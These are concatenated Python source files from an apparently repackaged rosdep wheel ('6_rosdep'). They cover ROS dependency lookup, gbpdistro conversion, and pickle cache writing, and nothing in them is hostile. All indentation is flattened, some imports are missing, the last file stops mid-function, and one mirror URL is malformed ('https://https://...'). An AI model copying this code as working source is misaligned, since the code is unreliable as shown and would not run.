from .platforms.pip import PIP_INSTALLER
from .platforms.redhat import YUM_INSTALLER
from .platforms.freebsd import PKG_INSTALLER
from .rep3 import download_targets_data
from .rosdistrohelper import get_targets
from .rospkg_loader import DEFAULT_VIEW_KEY
from .sources_list import get_sources_list_dir, DataSourceMatcher, SourcesListLoader
class ValidationFailed(Exception):
pass
def call(command, pipe=None):
"""
Copy of call() function from catkin-generate-debian to mimic output
"""
working_dir = '.'
# print('+ cd %s && ' % working_dir + ' '.join(command))
process = Popen(command, stdout=pipe, stderr=pipe, cwd=working_dir)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
raise CalledProcessError(retcode, command)
if pipe:
return output
def get_ubuntu_targets(rosdistro):
"""
Get a list of Ubuntu distro codenames for the specified ROS
distribution. This method blocks on an HTTP download.
:raises: :exc:`ValidationFailed`
"""
targets_data = get_targets()
legacy_targets = download_targets_data()
if 'fuerte' in legacy_targets:
targets_data['fuerte'] = {'ubuntu': legacy_targets['fuerte']}
if 'electric' in legacy_targets:
targets_data['electric'] = {'ubuntu': legacy_targets['electric']}
return targets_data[rosdistro]['ubuntu']
def get_installer(installer_name):
""" Expected installers APT_INSTALLER, YUM_INSTALLER, ..."""
installer_context = create_default_installer_context()
return installer_context.get_installer(installer_name)
def resolve_for_os(rosdep_key, view, installer, os_name, os_version):
"""
Resolve rosdep key to dependencies.
:param os_name: OS name, e.g. 'ubuntu'
:raises: :exc:`rosdep2.ResolutionError`
"""
d = view.lookup(rosdep_key)
ctx = create_default_installer_context()
os_installers = ctx.get_os_installer_keys(os_name)
default_os_installer = ctx.get_default_os_installer_key(os_name)
inst_key, rule = d.get_rule_for_platform(os_name, os_version, os_installers, default_os_installer)
assert inst_key in os_installers
return installer.resolve(rule)
def update_rosdep():
call(('rosdep', 'update'), pipe=PIPE)
def get_catkin_view(rosdistro_name, os_name, os_version, update=True):
"""
:raises: :exc:`ValidationFailed`
"""
sources_list_dir = get_sources_list_dir()
if not os.path.exists(sources_list_dir):
raise ValidationFailed("""rosdep database is not initialized, please run:
\tsudo rosdep init
""")
if update:
update_rosdep()
sources_matcher = DataSourceMatcher([rosdistro_name, os_name, os_version])
sources_loader = SourcesListLoader.create_default(matcher=sources_matcher)
if not (sources_loader.sources):
raise ValidationFailed("""rosdep database does not have any sources.
Please make sure you have a valid configuration in:
\t%s
""" % (sources_list_dir))
# for vestigial reasons, using the roskg loader, but we're only
# actually using the backend db as resolution is not resource-name based
lookup = RosdepLookup.create_from_rospkg(sources_loader=sources_loader)
return lookup.get_rosdep_view(DEFAULT_VIEW_KEY) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/catkin_support.py | catkin_support.py |
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
import yaml
try:
import urlparse
except ImportError:
import urllib.parse as urlparse # py3k
import os
from rospkg.os_detect import OS_DEBIAN
from rospkg.os_detect import OS_FEDORA
from rospkg.os_detect import OS_OSX
from rospkg.os_detect import OS_UBUNTU
from .core import InvalidData, DownloadFailure
from .platforms.debian import APT_INSTALLER
from .platforms.osx import BREW_INSTALLER
from .platforms.redhat import YUM_INSTALLER
from .rosdistrohelper import get_targets, get_release_file, PreRep137Warning
from .rep3 import download_targets_data # deprecated, will output warning
import warnings
create_default_installer_context = None
# py3k
try:
unicode
except NameError:
basestring = unicode = str
# location of an example gbpdistro file for reference and testing
FUERTE_GBPDISTRO_URL = 'https://https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro' \
'master/releases/fuerte.yaml'
# seconds to wait before aborting download of gbpdistro data
DOWNLOAD_TIMEOUT = 15.0
def get_owner_name(url):
"""
Given a gbpdistro url, returns the name of the github user in the url.
If the url is not a valid github url it returns the default `ros`.
This information is used to set the homebrew tap name, see:
https://github.com/ros-infrastructure/rosdep/pull/17
:returns: The github account in the given gbpdistro url
"""
result = 'ros'
try:
parsed = urlparse.urlparse(url)
if parsed.netloc == 'github.com':
result = parsed.path.split('/')[1]
except (ValueError, IndexError):
pass
return result
# For compatability url defaults to ''
def gbprepo_to_rosdep_data(gbpdistro_data, targets_data, url=''):
"""
DEPRECATED: the rosdistro file format has changed according to REP137
this function will yield a deprecation warning
:raises: :exc:`InvalidData`
"""
warnings.warn('deprecated: see REP137 and rosdistro', PreRep137Warning)
# Error reporting for this isn't nearly as good as it could be
# (e.g. doesn't separate gbpdistro vs. targets, nor provide
# origin), but rushing this implementation a bit.
try:
if not type(targets_data) == dict:
raise InvalidData('targets data must be a dict')
if not type(gbpdistro_data) == dict:
raise InvalidData('gbpdistro data must be a dictionary')
if gbpdistro_data['type'] != 'gbp':
raise InvalidData('gbpdistro must be of type "gbp"')
# compute the default target data for the release_name
release_name = gbpdistro_data['release-name']
if release_name not in targets_data:
raise InvalidData('targets file does not contain information '
'for release [%s]' % (release_name))
else:
# take the first match
target_data = targets_data[release_name]
# compute the rosdep data for each repo
rosdep_data = {}
gbp_repos = gbpdistro_data['repositories']
# Ensure gbp_repos is a dict
if type(gbp_repos) != dict:
raise InvalidData('invalid repo spec in gbpdistro data: ' + str(gbp_repos) +
'. Invalid repositories entry, must be dict.')
for rosdep_key, repo in gbp_repos.items():
if type(repo) != dict:
raise InvalidData('invalid repo spec in gbpdistro data: ' +
str(repo))
for pkg in repo.get('packages', {rosdep_key: None}):
rosdep_data[pkg] = {}
# for pkg in repo['packages']: indent the rest of the lines here.
# Do generation for ubuntu
rosdep_data[pkg][OS_UBUNTU] = {}
# Do generation for empty OS X entries
homebrew_name = '%s/%s/%s' % (get_owner_name(url),
release_name, rosdep_key)
rosdep_data[pkg][OS_OSX] = {
BREW_INSTALLER: {'packages': [homebrew_name]}
}
# - debian package name: underscores must be dashes
deb_package_name = 'ros-%s-%s' % (release_name, pkg)
deb_package_name = deb_package_name.replace('_', '-')
repo_targets = repo['target'] if 'target' in repo else 'all'
if repo_targets == 'all':
repo_targets = target_data
for t in repo_targets:
if not isinstance(t, basestring):
raise InvalidData('invalid target spec: %s' % (t))
# rosdep_data[pkg][OS_UBUNTU][t] = {
rosdep_data[pkg][OS_UBUNTU][t] = {
APT_INSTALLER: {'packages': [deb_package_name]}
}
rosdep_data[pkg]['_is_ros'] = True
return rosdep_data
except KeyError as e:
raise InvalidData('Invalid GBP-distro/targets format: missing key: ' +
str(e))
# REP137 compliant
def get_gbprepo_as_rosdep_data(gbpdistro):
"""
:raises: :exc:`InvalidData`
"""
distro_file = get_release_file(gbpdistro)
ctx = create_default_installer_context()
release_name = gbpdistro
rosdep_data = {}
default_installers = {}
gbp_repos = distro_file.repositories
for rosdep_key, repo in gbp_repos.items():
for pkg in repo.package_names:
rosdep_data[pkg] = {}
# following rosdep pull #17, use env var instead of github organization name
tap = os.environ.get('ROSDEP_HOMEBREW_TAP', 'ros')
# Do generation for empty OS X entries
homebrew_name = '%s/%s/%s' % (tap, release_name, rosdep_key)
rosdep_data[pkg][OS_OSX] = {
BREW_INSTALLER: {'packages': [homebrew_name]}
}
# - package name: underscores must be dashes
package_name = 'ros-%s-%s' % (release_name, pkg)
package_name = package_name.replace('_', '-')
for os_name in distro_file.platforms:
if os_name not in rosdep_data[pkg]:
rosdep_data[pkg][os_name] = {}
if os_name not in default_installers:
default_installers[os_name] = ctx.get_default_os_installer_key(os_name)
for os_code_name in distro_file.platforms[os_name]:
rosdep_data[pkg][os_name][os_code_name] = {
default_installers[os_name]: {'packages': [package_name]}
}
rosdep_data[pkg]['_is_ros'] = True
return rosdep_data
def download_gbpdistro_as_rosdep_data(gbpdistro_url, targets_url=None):
"""
Download gbpdistro file from web and convert format to rosdep distro data.
DEPRECATED: see REP137. This function will output
(at least) one deprecation warning
:param gbpdistro_url: url of gbpdistro file, ``str``
:param target_url: override URL of platform targets file
:raises: :exc:`DownloadFailure`
:raises: :exc:`InvalidData` If targets file does not pass cursory
validation checks.
"""
# we can convert a gbpdistro file into rosdep data by following a
# couple rules
# will output a warning
targets_data = download_targets_data(targets_url=targets_url)
try:
f = urlopen(gbpdistro_url, timeout=DOWNLOAD_TIMEOUT)
text = f.read()
f.close()
gbpdistro_data = yaml.safe_load(text)
# will output a warning
return gbprepo_to_rosdep_data(gbpdistro_data,
targets_data,
gbpdistro_url)
except Exception as e:
raise DownloadFailure('Failed to download target platform data '
'for gbpdistro:\n\t' + str(e)) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/gbpdistro_support.py | gbpdistro_support.py |
import hashlib
import os
import tempfile
from .core import CachePermissionError
try:
import cPickle as pickle
except ImportError:
import pickle
PICKLE_CACHE_EXT = '.pickle'
def compute_filename_hash(key_filenames):
sha_hash = hashlib.sha1()
if isinstance(key_filenames, list):
for key in key_filenames:
sha_hash.update(key.encode())
else:
sha_hash.update(key_filenames.encode())
return sha_hash.hexdigest()
def write_cache_file(source_cache_d, key_filenames, rosdep_data):
"""
:param source_cache_d: directory to write cache file to
:param key_filenames: filename (or list of filenames) to be used in hashing
:param rosdep_data: dictionary of data to serialize as YAML
:returns: name of file where cache is stored
:raises: :exc:`OSError` if cannot write to cache file/directory
:raises: :exc:`IOError` if cannot write to cache file/directory
"""
if not os.path.exists(source_cache_d):
os.makedirs(source_cache_d)
key_hash = compute_filename_hash(key_filenames)
filepath = os.path.join(source_cache_d, key_hash)
try:
write_atomic(filepath + PICKLE_CACHE_EXT, pickle.dumps(rosdep_data, 2), True)
except OSError as e:
raise CachePermissionError('Failed to write cache file: ' + str(e))
try:
os.unlink(filepath)
except OSError:
pass
return filepath
def write_atomic(filepath, data, binary=False):
# write data to new file
fd, filepath_tmp = tempfile.mkstemp(prefix=os.path.basename(filepath) + '.tmp.', dir=os.path.dirname(filepath))
if (binary):
fmode = 'wb'
else:
fmode = 'w'
with os.fdopen(fd, fmode) as f:
f.write(data)
f.close()
try:
# switch file atomically (if supported)
os.rename(filepath_tmp, filepath)
except OSError:
# fall back to non-atomic operation
try:
os.unlink(filepath)
except OSError:
pass
try:
os.rename(filepath_tmp, filepath)
except OSError:
os.unlink(filepath_tmp) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/cache_tools.py | cache_tools.py |
# Author Tully Foote/[email protected], Ken Conley/[email protected]
from __future__ import print_function
import sys
import yaml
from collections import defaultdict
from rospkg import RosPack, RosStack, ResourceNotFound
from .core import RosdepInternalError, InvalidData, rd_debug
from .model import RosdepDatabase
from .rospkg_loader import RosPkgLoader
from .dependency_graph import DependencyGraph
from .sources_list import SourcesListLoader
from . import catkin_packages
class RosdepDefinition(object):
"""
Single rosdep dependency definition. This data is stored as the
raw dictionary definition for the dependency.
See REP 111, 'Multiple Package Manager Support for Rosdep' for a
discussion of this raw format.
"""
def __init__(self, rosdep_key, data, origin='<dynamic>'):
"""
:param rosdep_key: key/name of rosdep dependency
:param data: raw rosdep data for a single rosdep dependency, ``dict``
:param origin: string that indicates where data originates from (e.g. filename)
"""
self.rosdep_key = rosdep_key
if not isinstance(data, dict):
raise InvalidData('rosdep data for [%s] must be a dictionary' % (self.rosdep_key), origin=origin)
self.data = data
self.origin = origin
def reverse_merge(self, new_data, origin='<dynamic>', verbose=False):
"""
Merge two definitions together, with existing rules taking precendence.
Definitions are merged at the os_name level, meaning that if two rules
exist with the same os_name, the first one wins.
:param data: raw rosdep data for a single rosdep dependency, ``dict``
:param origin: string that indicates where this new data comes from (e.g. filename)
"""
for os_name, rules in new_data.items():
if os_name not in self.data:
if verbose:
print('[%s] adding rules for os [%s] to [%s]' % (origin, os_name, self.rosdep_key), file=sys.stderr)
self.data[os_name] = rules
elif verbose:
print('[%s] ignoring [%s] for os [%s], already loaded' % (origin, self.rosdep_key, os_name), file=sys.stderr)
def get_rule_for_platform(self, os_name, os_version, installer_keys, default_installer_key):
"""
Get installer_key and rule for the specified rule. See REP 111 for precedence rules.
:param os_name: OS name to get rule for
:param os_version: OS version to get rule for
:param installer_keys: Keys of installers for platform, ``[str]``
:param default_installer_key: Default installer key for platform, ``[str]``
:returns: (installer_key, rosdep_args_dict), ``(str, dict)``
:raises: :exc:`ResolutionError` If no rule is available
:raises: :exc:`InvalidData` If rule data is not valid
"""
rosdep_key = self.rosdep_key
data = self.data
if type(data) != dict:
raise InvalidData('rosdep value for [%s] must be a dictionary' % (self.rosdep_key), origin=self.origin)
if os_name not in data:
raise ResolutionError(rosdep_key, data, os_name, os_version, 'No definition of [%s] for OS [%s]' % (rosdep_key, os_name))
data = data[os_name]
return_key = default_installer_key
# REP 111: rosdep first interprets the key as a
# PACKAGE_MANAGER. If this test fails, it will be interpreted
# as an OS_VERSION_CODENAME.
if type(data) == dict:
for installer_key in installer_keys:
if installer_key in data:
data = data[installer_key]
return_key = installer_key
break
else:
# data must be a dictionary, string, or list
if type(data) == dict:
# check for
# hardy:
# apt:
# stuff
# we've already checked for PACKAGE_MANAGER_KEY, so
# version key must be present here for data to be valid
# dictionary value.
# if the os_version is not defined and there is no wildcard
if os_version not in data and '*' not in data:
raise ResolutionError(rosdep_key, self.data, os_name, os_version, 'No definition of [%s] for OS version [%s]' % (rosdep_key, os_version))
# if the os_version has the value None
if os_version in data and data[os_version] is None:
raise ResolutionError(rosdep_key, self.data, os_name, os_version, '[%s] defined as "not available" for OS version [%s]' % (rosdep_key, os_version))
# if os version is not defined (and there is a wildcard) fallback to the wildcard
if os_version not in data:
os_version = '*'
data = data[os_version]
if type(data) == dict:
for installer_key in installer_keys:
if installer_key in data:
data = data[installer_key]
return_key = installer_key
break
# Check if the rule is null
if data is None:
raise ResolutionError(rosdep_key, self.data, os_name, os_version, '[%s] defined as "not available" for OS version [%s]' % (rosdep_key, os_version))
if type(data) not in (dict, list, type('str')):
raise InvalidData('rosdep OS definition for [%s:%s] must be a dictionary, string, or list: %s' % (self.rosdep_key, os_name, data), origin=self.origin)
return return_key, data
def __str__(self):
return '%s:\n%s' % (self.origin, yaml.dump(self.data, default_flow_style=False))
class ResolutionError(Exception):
def __init__(self, rosdep_key, rosdep_data, os_name, os_version, message):
self.rosdep_key = rosdep_key
self.rosdep_data = rosdep_data
self.os_name = os_name
self.os_version = os_version
super(ResolutionError, self).__init__(message)
def __str__(self):
if self.rosdep_data:
pretty_data = yaml.dump(self.rosdep_data, default_flow_style=False)
else:
pretty_data = '<no data>'
return """%s
\trosdep key : %s
\tOS name : %s
\tOS version : %s
\tData:\n%s""" % (self.args[0], self.rosdep_key, self.os_name, self.os_version, pretty_data.replace('\n', '\n\t\t'))
class RosdepView(object):
"""
View of :class:`RosdepDatabase`. Unlike :class:`RosdepDatabase`,
which stores :class:`RosdepDatabaseEntry` data for all stacks, a
view merges entries for a particular stack. This view can then be
queried to lookup and resolve individual rosdep dependencies.
"""
def __init__(self, name):
self.name = name
self.rosdep_defs = {} # {str: RosdepDefinition}
def __str__(self):
return '\n'.join(['%s: %s' % val for val in self.rosdep_defs.items()])
def lookup(self, rosdep_name):
"""
:returns: :class:`RosdepDefinition`
:raises: :exc:`KeyError` If *rosdep_name* is not declared
"""
return self.rosdep_defs[rosdep_name]
def keys(self):
"""
:returns: list of rosdep names in this view
"""
return self.rosdep_defs.keys()
def merge(self, update_entry, override=False, verbose=False):
"""
Merge rosdep database update into main database. Merge rules
are first entry to declare a key wins. There are no
conflicts. This rule logic is modelled after the apt sources
list.
:param override: Ignore first-one-wins rules and instead
always use rules from update_entry
"""
if verbose:
print('view[%s]: merging from cache of [%s]' % (self.name, update_entry.origin))
db = self.rosdep_defs
for dep_name, dep_data in update_entry.rosdep_data.items():
# convert data into RosdepDefinition model
update_definition = RosdepDefinition(dep_name, dep_data, update_entry.origin)
# First rule wins or override, no rule-merging.
if override or dep_name not in db:
db[dep_name] = update_definition
elif dep_name in db:
db[dep_name].reverse_merge(dep_data, update_entry.origin, verbose=verbose)
def prune_catkin_packages(rosdep_keys, verbose=False):
workspace_pkgs = catkin_packages.get_workspace_packages()
if not workspace_pkgs:
return rosdep_keys
for i, rosdep_key in reversed(list(enumerate(rosdep_keys))):
if rosdep_key in workspace_pkgs:
# If workspace packages listed (--catkin-workspace)
# and if the rosdep_key is a package in that
# workspace, then skip it rather than resolve it
if verbose:
print("rosdep key '{0}'".format(rosdep_key) +
' is in the catkin workspace, skipping.',
file=sys.stderr)
del rosdep_keys[i]
return rosdep_keys
def prune_skipped_packages(rosdep_keys, skipped_keys, verbose=False):
if not skipped_keys:
return rosdep_keys
for i, rosdep_key in reversed(list(enumerate(rosdep_keys))):
if rosdep_key in skipped_keys:
# If the key is in the list of keys to explicitly skip, skip it
if verbose:
print("rosdep key '{0}'".format(rosdep_key) +
' was listed in the skipped packages, skipping.',
file=sys.stderr)
del rosdep_keys[i]
return rosdep_keys
class RosdepLookup(object):
"""
Lookup rosdep definitions. Provides API for most
non-install-related commands for rosdep.
:class:`RosdepLookup` caches data as it is loaded, so changes made
on the filesystem will not be reflected if the rosdep information
has already been loaded.
"""
def __init__(self, rosdep_db, loader):
"""
:param loader: Loader to use for loading rosdep data by stack
name, ``RosdepLoader``
:param rosdep_db: Database to load definitions into, :class:`RosdepDatabase`
"""
self.rosdep_db = rosdep_db
self.loader = loader
self._view_cache = {} # {str: {RosdepView}}
self._resolve_cache = {} # {str : (os_name, os_version, installer_key, resolution, dependencies)}
# some APIs that deal with the entire environment save errors
# in to self.errors instead of raising them in order to be
# robust to single-stack faults.
self.errors = []
# flag for turning on printing to console
self.verbose = False
self.skipped_keys = []
def get_loader(self):
return self.loader
def get_errors(self):
"""
Retrieve error state for API calls that do not directly report
error state. This is the case for APIs like
:meth:`RosdepLookup.where_defined` that are meant to be
fault-tolerant to single-stack failures.
:returns: List of exceptions, ``[Exception]``
"""
return self.errors[:]
def get_rosdeps(self, resource_name, implicit=True):
"""
Get rosdeps that *resource_name* (e.g. package) requires.
:param implicit: If ``True``, include implicit rosdep
dependencies. Default: ``True``.
:returns: list of rosdep names, ``[str]``
"""
return self.loader.get_rosdeps(resource_name, implicit=implicit)
def get_resources_that_need(self, rosdep_name):
"""
:param rosdep_name: name of rosdep dependency
:returns: list of package names that require rosdep, ``[str]``
"""
return [k for k in self.loader.get_loadable_resources() if rosdep_name in self.get_rosdeps(k, implicit=False)]
@staticmethod
def create_from_rospkg(rospack=None, rosstack=None,
sources_loader=None,
verbose=False, dependency_types=None):
"""
Create :class:`RosdepLookup` based on current ROS package
environment.
:param rospack: (optional) Override :class:`rospkg.RosPack`
instance used to crawl ROS packages.
:param rosstack: (optional) Override :class:`rospkg.RosStack`
instance used to crawl ROS stacks.
:param sources_loader: (optional) Override SourcesLoader used
for managing sources.list data sources.
:param dependency_types: (optional) List of dependency types.
Allowed: {'build', 'buildtool', 'build_export', 'buildtool_export', 'exec', 'test', 'doc'}
"""
# initialize the loader
if rospack is None:
rospack = RosPack()
if rosstack is None:
rosstack = RosStack()
if sources_loader is None:
sources_loader = SourcesListLoader.create_default(verbose=verbose)
if dependency_types is None:
dependency_types = []
rosdep_db = RosdepDatabase()
# Use sources list to initialize rosdep_db. Underlay has no
# notion of specific resources, and its view keys are just the
# individual sources it can load from. SourcesListLoader
# cannot do delayed evaluation of OS setting due to matcher.
underlay_key = SourcesListLoader.ALL_VIEW_KEY
# Create the rospkg loader on top of the underlay
loader = RosPkgLoader(rospack=rospack, rosstack=rosstack,
underlay_key=underlay_key, dependency_types=dependency_types)
# create our actual instance
lookup = RosdepLookup(rosdep_db, loader)
# load in the underlay
lookup._load_all_views(loader=sources_loader)
# use dependencies to implement precedence
view_dependencies = sources_loader.get_loadable_views()
rosdep_db.set_view_data(underlay_key, {}, view_dependencies, underlay_key)
return lookup
def resolve_all(self, resources, installer_context, implicit=False):
"""
Resolve all the rosdep dependencies for *resources* using *installer_context*.
:param resources: list of resources (e.g. packages), ``[str]``
:param installer_context: :class:`InstallerContext`
:param implicit: Install implicit (recursive) dependencies of
resources. Default ``False``.
:returns: (resolutions, errors), ``([(str, [str])], {str: ResolutionError})``. resolutions provides
an ordered list of resolution tuples. A resolution tuple's first element is the installer
key (e.g.: apt or homebrew) and the second element is a list of opaque resolution values for that
installer. errors maps package names to an :exc:`ResolutionError` or :exc:`KeyError` exception.
:raises: :exc:`RosdepInternalError` if unexpected error in constructing dependency graph
:raises: :exc:`InvalidData` if a cycle occurs in constructing dependency graph
"""
depend_graph = DependencyGraph()
errors = {}
# TODO: resolutions dictionary should be replaced with resolution model instead of mapping (undefined) keys.
for resource_name in resources:
try:
rosdep_keys = self.get_rosdeps(resource_name, implicit=implicit)
if self.verbose:
print('resolve_all: resource [%s] requires rosdep keys [%s]' % (resource_name, ', '.join(rosdep_keys)), file=sys.stderr)
rosdep_keys = prune_catkin_packages(rosdep_keys, self.verbose)
rosdep_keys = prune_skipped_packages(rosdep_keys, self.skipped_keys, self.verbose)
for rosdep_key in rosdep_keys:
try:
installer_key, resolution, dependencies = \
self.resolve(rosdep_key, resource_name, installer_context)
depend_graph[rosdep_key]['installer_key'] = installer_key
depend_graph[rosdep_key]['install_keys'] = list(resolution)
depend_graph[rosdep_key]['dependencies'] = list(dependencies)
while dependencies:
depend_rosdep_key = dependencies.pop()
# prevent infinite loop
if depend_rosdep_key in depend_graph:
continue
installer_key, resolution, more_dependencies = \
self.resolve(depend_rosdep_key, resource_name, installer_context)
dependencies.extend(more_dependencies)
depend_graph[depend_rosdep_key]['installer_key'] = installer_key
depend_graph[depend_rosdep_key]['install_keys'] = list(resolution)
depend_graph[depend_rosdep_key]['dependencies'] = list(more_dependencies)
except ResolutionError as e:
errors[resource_name] = e
except ResourceNotFound as e:
errors[resource_name] = e
try:
# TODO: I really don't like AssertionErrors here; this should be modeled as 'CyclicGraphError'
# or something more explicit. No need to continue if this API errors.
resolutions_flat = depend_graph.get_ordered_dependency_list()
except AssertionError as e:
raise InvalidData('cycle in dependency graph detected: %s' % (e))
except KeyError as e:
raise RosdepInternalError(e)
return resolutions_flat, errors
def resolve(self, rosdep_key, resource_name, installer_context):
"""
Resolve a :class:`RosdepDefinition` for a particular
os/version spec.
:param resource_name: resource (e.g. ROS package) to resolve key within
:param rosdep_key: rosdep key to resolve
:param os_name: OS name to use for resolution
:param os_version: OS name to use for resolution
:returns: *(installer_key, resolution, dependencies)*, ``(str,
[opaque], [str])``. *resolution* are the system
dependencies for the specified installer. The value is an
opaque list and meant to be interpreted by the
installer. *dependencies* is a list of rosdep keys that the
definition depends on.
:raises: :exc:`ResolutionError` If *rosdep_key* cannot be resolved for *resource_name* in *installer_context*
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be located
"""
os_name, os_version = installer_context.get_os_name_and_version()
view = self.get_rosdep_view_for_resource(resource_name)
if view is None:
raise ResolutionError(rosdep_key, None, os_name, os_version, '[%s] does not have a rosdep view' % (resource_name))
try:
# print("KEYS", view.rosdep_defs.keys())
definition = view.lookup(rosdep_key)
except KeyError:
rd_debug(view)
raise ResolutionError(rosdep_key, None, os_name, os_version, 'Cannot locate rosdep definition for [%s]' % (rosdep_key))
# check cache: the main motivation for the cache is that
# source rosdeps are expensive to resolve
if rosdep_key in self._resolve_cache:
cache_value = self._resolve_cache[rosdep_key]
cache_os_name = cache_value[0]
cache_os_version = cache_value[1]
cache_view_name = cache_value[2]
if (
cache_os_name == os_name and
cache_os_version == os_version and
cache_view_name == view.name
):
return cache_value[3:]
# get the rosdep data for the platform
try:
installer_keys = installer_context.get_os_installer_keys(os_name)
default_key = installer_context.get_default_os_installer_key(os_name)
except KeyError:
raise ResolutionError(rosdep_key, definition.data, os_name, os_version, 'Unsupported OS [%s]' % (os_name))
installer_key, rosdep_args_dict = definition.get_rule_for_platform(os_name, os_version, installer_keys, default_key)
# resolve the rosdep data for the platform
try:
installer = installer_context.get_installer(installer_key)
except KeyError:
raise ResolutionError(rosdep_key, definition.data, os_name, os_version, 'Unsupported installer [%s]' % (installer_key))
resolution = installer.resolve(rosdep_args_dict)
dependencies = installer.get_depends(rosdep_args_dict)
# cache value
# the dependencies list is copied to prevent mutation before next cache hit
self._resolve_cache[rosdep_key] = os_name, os_version, view.name, installer_key, resolution, list(dependencies)
return installer_key, resolution, dependencies
def _load_all_views(self, loader):
"""
Load all available view keys. In general, this is equivalent
to loading all stacks on the package path. If
:exc:`InvalidData` errors occur while loading a view,
they will be saved in the *errors* field.
:param loader: override self.loader
:raises: :exc:`RosdepInternalError`
"""
for resource_name in loader.get_loadable_views():
try:
self._load_view_dependencies(resource_name, loader)
except ResourceNotFound as e:
self.errors.append(e)
except InvalidData as e:
self.errors.append(e)
def _load_view_dependencies(self, view_key, loader):
"""
Initialize internal :exc:`RosdepDatabase` on demand. Not
thread-safe.
:param view_key: name of view to load dependencies for.
:raises: :exc:`rospkg.ResourceNotFound` If view cannot be located
:raises: :exc:`InvalidData` if view's data is invaid
:raises: :exc:`RosdepInternalError`
"""
rd_debug('_load_view_dependencies[%s]' % (view_key))
db = self.rosdep_db
if db.is_loaded(view_key):
return
try:
loader.load_view(view_key, db, verbose=self.verbose)
entry = db.get_view_data(view_key)
rd_debug('_load_view_dependencies[%s]: %s' % (view_key, entry.view_dependencies))
for d in entry.view_dependencies:
self._load_view_dependencies(d, loader)
except InvalidData:
# mark view as loaded: as we are caching, the valid
# behavior is to not attempt loading this view ever
# again.
db.mark_loaded(view_key)
# re-raise
raise
except KeyError as e:
raise RosdepInternalError(e)
def create_rosdep_view(self, view_name, view_keys, verbose=False):
"""
:param view_name: name of view to create
:param view_keys: order list of view names to merge, first one wins
:param verbose: print debugging output
"""
# Create view and initialize with dbs from all of the
# dependencies.
view = RosdepView(view_name)
db = self.rosdep_db
for view_key in view_keys:
db_entry = db.get_view_data(view_key)
view.merge(db_entry, verbose=verbose)
if verbose:
print('View [%s], merged views:\n' % (view_name) + '\n'.join([' * %s' % view_key for view_key in view_keys]), file=sys.stderr)
return view
def get_rosdep_view_for_resource(self, resource_name, verbose=False):
"""
Get a :class:`RosdepView` for a specific ROS resource *resource_name*.
Views can be queries to resolve rosdep keys to
definitions.
:param resource_name: Name of ROS resource (e.g. stack,
package) to create view for, ``str``.
:returns: :class:`RosdepView` for specific ROS resource
*resource_name*, or ``None`` if no view is associated with this resource.
:raises: :exc:`RosdepConflict` if view cannot be created due
to conflict rosdep definitions.
:raises: :exc:`rospkg.ResourceNotFound` if *view_key* cannot be located
:raises: :exc:`RosdepInternalError`
"""
view_key = self.loader.get_view_key(resource_name)
if not view_key:
# NOTE: this may not be the right behavior and this happens
# for packages that are not in a stack.
return None
return self.get_rosdep_view(view_key, verbose=verbose)
def get_rosdep_view(self, view_key, verbose=False):
"""
Get a :class:`RosdepView` associated with *view_key*. Views
can be queries to resolve rosdep keys to definitions.
:param view_key: Name of rosdep view (e.g. ROS stack name), ``str``
:raises: :exc:`RosdepConflict` if view cannot be created due
to conflict rosdep definitions.
:raises: :exc:`rospkg.ResourceNotFound` if *view_key* cannot be located
:raises: :exc:`RosdepInternalError`
"""
if view_key in self._view_cache:
return self._view_cache[view_key]
# lazy-init
self._load_view_dependencies(view_key, self.loader)
# use dependencies to create view
try:
dependencies = self.rosdep_db.get_view_dependencies(view_key)
except KeyError as e:
# convert to ResourceNotFound. This should be decoupled
# in the future
raise ResourceNotFound(str(e.args[0]))
# load views in order
view = self.create_rosdep_view(view_key, dependencies + [view_key], verbose=verbose)
self._view_cache[view_key] = view
return view
def get_views_that_define(self, rosdep_name):
"""
Locate all views that directly define *rosdep_name*. A
side-effect of this method is that all available rosdep files
in the configuration will be loaded into memory.
Error state from single-stack failures
(e.g. :exc:`InvalidData`, :exc:`ResourceNotFound`) are
not propagated. Caller must check
:meth:`RosdepLookup.get_errors` to check for single-stack
error state. Error state does not reset -- it accumulates.
:param rosdep_name: name of rosdep to lookup
:returns: list of (stack_name, origin) where rosdep is defined.
:raises: :exc:`RosdepInternalError`
"""
# TODOXXX: change this to return errors object so that caller cannot ignore
self._load_all_views(self.loader)
db = self.rosdep_db
retval = []
for view_name in db.get_view_names():
entry = db.get_view_data(view_name)
# not much abstraction in the entry object
if rosdep_name in entry.rosdep_data:
retval.append((view_name, entry.origin))
return retval | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/lookup.py | lookup.py |
# Author Tully Foote/[email protected], Ken Conley/[email protected]
from __future__ import print_function
import os
import subprocess
import traceback
from rospkg.os_detect import OsDetect
from .core import rd_debug, RosdepInternalError, InstallFailed, print_bold, InvalidData
# kwc: InstallerContext is basically just a bunch of dictionaries with
# defined lookup methods. It really encompasses two facets of a
# rosdep configuration: the pluggable nature of installers and
# platforms, as well as the resolution of the operating system for a
# specific machine. It is possible to decouple those two notions,
# though there are some touch points over how this interfaces with the
# rospkg.os_detect library, i.e. how platforms can tweak these
# detectors and how the higher-level APIs can override them.
class InstallerContext(object):
"""
:class:`InstallerContext` manages the context of execution for rosdep as it
relates to the installers, OS detectors, and other extensible
APIs.
"""
def __init__(self, os_detect=None):
"""
:param os_detect: (optional)
:class:`rospkg.os_detect.OsDetect` instance to use for
detecting platforms. If `None`, default instance will be
used.
"""
# platform configuration
self.installers = {}
self.os_installers = {}
self.default_os_installer = {}
# stores configuration of which value to use for the OS version key (version number or codename)
self.os_version_type = {}
# OS detection and override
if os_detect is None:
os_detect = OsDetect()
self.os_detect = os_detect
self.os_override = None
self.verbose = False
def set_verbose(self, verbose):
self.verbose = verbose
def set_os_override(self, os_name, os_version):
"""
Override the OS detector with *os_name* and *os_version*. See
:meth:`InstallerContext.detect_os`.
:param os_name: OS name value to use, ``str``
:param os_version: OS version value to use, ``str``
"""
if self.verbose:
print('overriding OS to [%s:%s]' % (os_name, os_version))
self.os_override = os_name, os_version
def get_os_version_type(self, os_name):
return self.os_version_type.get(os_name, OsDetect.get_version)
def set_os_version_type(self, os_name, version_type):
